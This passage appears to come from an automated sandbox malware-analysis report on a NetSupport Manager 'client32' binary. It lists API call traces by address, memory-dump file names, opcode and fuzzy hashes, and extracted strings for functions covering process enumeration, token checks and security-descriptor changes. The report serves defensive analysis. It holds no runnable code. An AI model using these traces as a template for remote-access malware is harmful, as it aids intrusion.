                                                                                                                                                                                                    • MessageBeep.USER32(000000FF), ref: 11043705
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 1104372A
                                                                                                                                                                                                    • SetFocus.USER32(00000000), ref: 11043731
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ItemWindow$Text$BeepBringEnvironmentExpandExtractFocusForegroundIconMessageStringsTimerwsprintf
                                                                                                                                                                                                    • String ID: *UserAckRejectDefault$*UserAckRejectWording$*UserAckWording$AckDlgDisplayText$AckDlgTimeOut$Client$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$helpdesk.ico$m_hWnd
                                                                                                                                                                                                    • API String ID: 2161888955-1930157642
                                                                                                                                                                                                    • Opcode ID: 0a3e1f038ca4068b0f2d1c4e0e34c7b493bd042f92a9b469ae5aad1e0cb67957
                                                                                                                                                                                                    • Instruction ID: ded1bb61fb3941f1bcfc90b6e22c684d82d72c36ad168629116a92ba92965352
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a3e1f038ca4068b0f2d1c4e0e34c7b493bd042f92a9b469ae5aad1e0cb67957
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83B12774B40316AFE715CB64CCC5FEEB3A5AF44708F2081A8F6559F2C1DAB1B9848B90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141710: GetVersionExA.KERNEL32(111ECE98,76596610), ref: 11141740
                                                                                                                                                                                                      • Part of subcall function 11141710: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
                                                                                                                                                                                                      • Part of subcall function 110424D0: SendMessageA.USER32(?,000006D4,00000000,00000000), ref: 1104253A
                                                                                                                                                                                                      • Part of subcall function 110424D0: GetWindowLongA.USER32(00000000,000000F0), ref: 11042541
                                                                                                                                                                                                      • Part of subcall function 110424D0: IsWindow.USER32(00000000), ref: 1104254E
                                                                                                                                                                                                      • Part of subcall function 110424D0: GetWindowRect.USER32(00000000,11049320), ref: 11042565
                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 11049334
                                                                                                                                                                                                    • WindowFromPoint.USER32(?,?,?,?,00000000), ref: 1104935B
                                                                                                                                                                                                    • GetClassNameA.USER32(00000000,?,00000040), ref: 1104936D
                                                                                                                                                                                                    • WaitForInputIdle.USER32(?,000003E8), ref: 11049488
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 1104949B
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 110494A4
                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 110494AD
                                                                                                                                                                                                    • EnumWindows.USER32(110425D0,?), ref: 11049504
                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 11049520
                                                                                                                                                                                                    • WindowFromPoint.USER32(?,?,?,?,?,?,?,00000000), ref: 1104953A
                                                                                                                                                                                                    • GetClassNameA.USER32(00000000,?,00000040), ref: 11049549
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$ClassCloseCursorFromHandleNamePointRect$EnumIdleInputLongMessageOpenSendVersionWaitWindows
                                                                                                                                                                                                    • String ID: "%sNSClientTB.exe"$'$*ExitMetroBreak$*ExitMetroCloseDelay$ActivateStui=%d, @%d,%d, actwin=%x [%s]$ActivateStui=-1, @%d,%d, actwin=%x [%s]$Client$NSMCoolbar
                                                                                                                                                                                                    • API String ID: 3920443244-2853765610
                                                                                                                                                                                                    • Opcode ID: a37fe7b023270c55d5fac800e6c82e3ef41093a7139e55b8864d2da1d5655942
                                                                                                                                                                                                    • Instruction ID: 1967bb51930ead73ce48ca5e19d163332f2271a687d5ff16e8e37c73a50f3493
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a37fe7b023270c55d5fac800e6c82e3ef41093a7139e55b8864d2da1d5655942
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82A1C575E01229AFDB11CFA0CCC5FAAB7B9EB4A704F1041F9E919A7280E7316944CF61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetUserObjectSecurity.USER32(?,?,00000000,00000000,?), ref: 1108B5A8
                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 1108B5BA
                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 1108B5C1
                                                                                                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,?,?), ref: 1108B5D7
                                                                                                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 1108B5F5
                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 1108B601
                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 1108B608
                                                                                                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,?,?), ref: 1108B61E
                                                                                                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 1108B640
                                                                                                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 1108B659
                                                                                                                                                                                                    • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 1108B6CF
                                                                                                                                                                                                    • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 1108B6E7
                                                                                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,?), ref: 1108B709
                                                                                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,?), ref: 1108B725
                                                                                                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 1108B745
                                                                                                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 1108B75F
                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 1108B779
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 1108B77C
                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 1108B788
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 1108B78B
                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 1108B797
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 1108B79A
                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 1108B7A6
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 1108B7A9
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: HeapSecurity$DescriptorObjectProcessUser$DaclFree$AllocInitialize
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3868453208-0
                                                                                                                                                                                                    • Opcode ID: 015db0472866a057f11627a97bef82f7a780eef81db8c93d935b3b7f826351f9
                                                                                                                                                                                                    • Instruction ID: 24916009da05bac64f327b391b31f065aebaebe732b5bb9ea8c499bcd8809223
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 015db0472866a057f11627a97bef82f7a780eef81db8c93d935b3b7f826351f9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6811D72D04619ABEB11EB98CC80FEEB7BCFF48704F054159EA00A7244D774AE05CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetObjectA.GDI32(?,00000018,?), ref: 110ED2AE
                                                                                                                                                                                                    • GetStockObject.GDI32(0000000F), ref: 110ED2C2
                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 110ED33A
                                                                                                                                                                                                    • SelectPalette.GDI32(00000000,00000000,00000000), ref: 110ED34B
                                                                                                                                                                                                    • RealizePalette.GDI32(00000000), ref: 110ED351
                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,?,00000000), ref: 110ED36C
                                                                                                                                                                                                    • SelectPalette.GDI32(00000000,?,00000001), ref: 110ED380
                                                                                                                                                                                                    • RealizePalette.GDI32(00000000), ref: 110ED383
                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 110ED38B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Palette$ObjectRealizeSelect$AllocGlobalReleaseStock
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1969595663-0
                                                                                                                                                                                                    • Opcode ID: 460c3ef96ebe8ed115c01ac097ffa682f3726c3033c725e46577f46786f58dec
                                                                                                                                                                                                    • Instruction ID: 99ab53906cf2362fb71f393f1a059b673ec6ad63d3e9dfc730451934018f7e7b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 460c3ef96ebe8ed115c01ac097ffa682f3726c3033c725e46577f46786f58dec
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 747193B1E01229AFDB01DFE9CC89BEEB7B9FF88714F148056FA15E7244D67499008B61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(psapi.dll,BBC4A55B,00000001,?,?,00000000,11185E66,000000FF,?,1110421F,00000000,?,?,?), ref: 1110332D
                                                                                                                                                                                                      • Part of subcall function 111347D0: GetVersion.KERNEL32(00000000,75C20BD0,00000000), ref: 111347F3
                                                                                                                                                                                                      • Part of subcall function 111347D0: GetModuleHandleA.KERNEL32(ntdll.dll), ref: 11134814
                                                                                                                                                                                                      • Part of subcall function 111347D0: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 11134824
                                                                                                                                                                                                      • Part of subcall function 111347D0: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 11134841
                                                                                                                                                                                                      • Part of subcall function 111347D0: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 1113484D
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,1110421F,00000000,?,?,?), ref: 1110337F
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 111033B6
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 1110343F
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 111034C1
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 111034E3
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 111034F0
                                                                                                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 11103509
                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,?,?,1110421F), ref: 11103570
                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,0000000C(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,1110421F), ref: 11103597
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,1110421F), ref: 111035EF
                                                                                                                                                                                                      • Part of subcall function 11103110: GetTickCount.KERNEL32 ref: 1110313E
                                                                                                                                                                                                      • Part of subcall function 11103110: EnterCriticalSection.KERNEL32(111EC5C4), ref: 11103147
                                                                                                                                                                                                      • Part of subcall function 11103110: GetTickCount.KERNEL32 ref: 1110314D
                                                                                                                                                                                                      • Part of subcall function 11103110: GetTickCount.KERNEL32 ref: 111031A0
                                                                                                                                                                                                      • Part of subcall function 11103110: LeaveCriticalSection.KERNEL32(111EC5C4), ref: 111031A9
                                                                                                                                                                                                      • Part of subcall function 110F3BB0: WaitForSingleObject.KERNEL32(?,00000000,?,?,111049C5,?,TerminateVistaUI), ref: 110F3BC1
                                                                                                                                                                                                      • Part of subcall function 110F3BB0: InterlockedExchange.KERNEL32(?,00000000), ref: 110F3BCD
                                                                                                                                                                                                      • Part of subcall function 110F3BB0: CloseHandle.KERNEL32(00000000), ref: 110F3BD8
                                                                                                                                                                                                      • Part of subcall function 110F3BB0: InterlockedIncrement.KERNEL32(111EC5B4), ref: 110F3C05
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 111035F6
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,1110421F), ref: 11103646
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,1110421F), ref: 11103651
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: HandleLibrary$AddressProc$CloseCountFreeTick$CriticalErrorInterlockedLastLoadModuleOpenProcessSectionToken$EnterExchangeIncrementInformationLeaveObjectSingleVersionWait
                                                                                                                                                                                                    • String ID: EnumProcesses$Kernel32.dll$ProcessIdToSessionId$psapi.dll
                                                                                                                                                                                                    • API String ID: 2847773570-617439319
                                                                                                                                                                                                    • Opcode ID: b3600c8a1196151fdc18ced844d466fa8542599c62b3b8d15a5985b8e22f9588
                                                                                                                                                                                                    • Instruction ID: 7102d60838122e4a6cb8a6baed9df5fda1baf24c5a04c60c3b4407c25d2de74c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3600c8a1196151fdc18ced844d466fa8542599c62b3b8d15a5985b8e22f9588
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80A14975D0426A9FDB249F558DC5ADEFBB4BB08304F4085EEE659E3240D7705AC08F61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                    • SetCursor.USER32(00000000,?,00000000), ref: 110F53CB
                                                                                                                                                                                                    • ShowCursor.USER32(00000000), ref: 110F53D8
                                                                                                                                                                                                    • OpenEventA.KERNEL32(00100000,00000000,NSLockExit), ref: 110F53E9
                                                                                                                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,?,000000BF), ref: 110F5413
                                                                                                                                                                                                    • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F5432
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 110F5443
                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 110F544C
                                                                                                                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000BF), ref: 110F5460
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 110F5473
                                                                                                                                                                                                    • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F548B
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 110F549E
                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 110F54A7
                                                                                                                                                                                                    • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F54BA
                                                                                                                                                                                                    • ShowCursor.USER32(00000001), ref: 110F54C2
                                                                                                                                                                                                    • SetCursor.USER32(?), ref: 110F54CF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$Cursor$DispatchMultipleObjectsShowTranslateWait$CloseEventHandleOpenwsprintf
                                                                                                                                                                                                    • String ID: NSLockExit$|ZvZv
                                                                                                                                                                                                    • API String ID: 3796038594-999940717
                                                                                                                                                                                                    • Opcode ID: f1b6d6177d52e0c3756226750f04fdb34155f1e8b4de2aa2837cdf87b9045ced
                                                                                                                                                                                                    • Instruction ID: da66d542c3fb9b9b9736b56b4e9605354d9b8fdeed183c23e7030b173a746b46
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f1b6d6177d52e0c3756226750f04fdb34155f1e8b4de2aa2837cdf87b9045ced
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0451AC75E0032AABDB11DFA48C81FEDF7B8EB44718F1085A5E615E7184EB71AA40CF91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141710: GetVersionExA.KERNEL32(111ECE98,76596610), ref: 11141740
